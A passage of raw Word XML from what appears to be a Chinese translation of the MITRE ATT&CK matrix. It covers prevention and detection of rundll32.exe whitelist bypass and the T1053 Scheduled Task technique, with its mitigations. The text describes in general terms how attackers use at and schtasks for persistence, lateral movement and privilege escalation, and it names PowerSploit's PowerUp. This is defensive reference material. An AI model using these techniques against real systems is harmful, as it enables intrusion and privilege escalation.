                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>防护</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D95E622" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可使用微软</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>EMET</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（增强缓解体验工具包）的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ASR</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（攻击面减少）功能来阻止</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>rundll32.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>绕过白名单。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00963DD2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ECE5A76" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D712B0B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来检测和分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>rundll32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的执行和参数。将</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>rundll32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的最近调用与已知恰当参数及已加载动态链接库的历史记录进行比较来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常和潜藏的攻击活动。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>rundll32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用之前和之后使用的命令参数也可用于确定正在加载的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>动态链接库</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的来源和目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298D49F5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>定时</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>任务</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="1BEDFDE1" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C5B0F1A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1053</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C5F1CC8" w14:textId="15315B8B" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="00B438B1">
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27DFF14F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55393692" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>权限：管理员，系统，用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EEF54D6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>有效</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>权限：系统，管理员，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E964866" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程监控，进程命令行参数，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>事件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36641C70" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>是否支持远程：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39A3D50C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId32" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00671A0D">
                <w:t>CAPEC-557</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00671A0D">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D30F776" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Leo Loobeek</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>@leoloobeek</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Travis Smith</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Tripwire</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Alain Homewood</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Insomnia Security</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A925C5C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14316D05" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="473008D8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>诸如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>schtasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之类的实用程序可与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Windows Task Scheduler</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一起</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调度程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>或脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在某日期和时间执行。只要身份认证</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>通过可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并且打开了文件和打印机共享功能，就</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可以在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>系统上调度</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任务。在远程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>系统上调度任务通常需要远程系统管理员群组的成员执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D030DF" w14:textId="45701E22" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会通过任务调度在系统启动时或在计划的基础上执行程序以实现</w:t>
      </w:r>
      <w:r w:rsidR="008F7150">
        <w:t>持久性</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，作为横向移动的一部分进行远程执行，获得系统权限，或者在指定账号的上下文下运行进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EF8BCB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7331"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="717864BD" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="51D2A7BD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1979D1F5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="38065CC3" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32BDA477" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>审核</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="305B422C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>像</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>PowerSploit</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>框架这样的工具包包含</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>PowerUp</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>模块，这些模块可用来探索系统中可用于</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>提升权限的计划任务的权限弱点</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="1E8835F8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67218951" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>操作系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C9DD886" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>配置计划任务的设置来强制任务在已通过身份认证账号的上下文中运行，而不是允许它们使用系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>运行。关联的注册表项位于</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
              </w:rPr>
              <w:t>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。可通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>GPO</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来配置设置，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>路径</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：计算机配置</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; [</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>策略</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&gt; Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>设置</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>安全设置</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>本地策略</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>安全选项：域控制器：允许服务器操作员调度任务。将“允许服务器操作员调度任务”设置为</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>禁用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="616320CE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A8B21CA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特权账号管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="769C3326" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将“增加调度优先级”配置为仅允许管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>群</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>组拥有调度优先级进程的权限。可通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>GPO</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>配置设置，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>路径</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
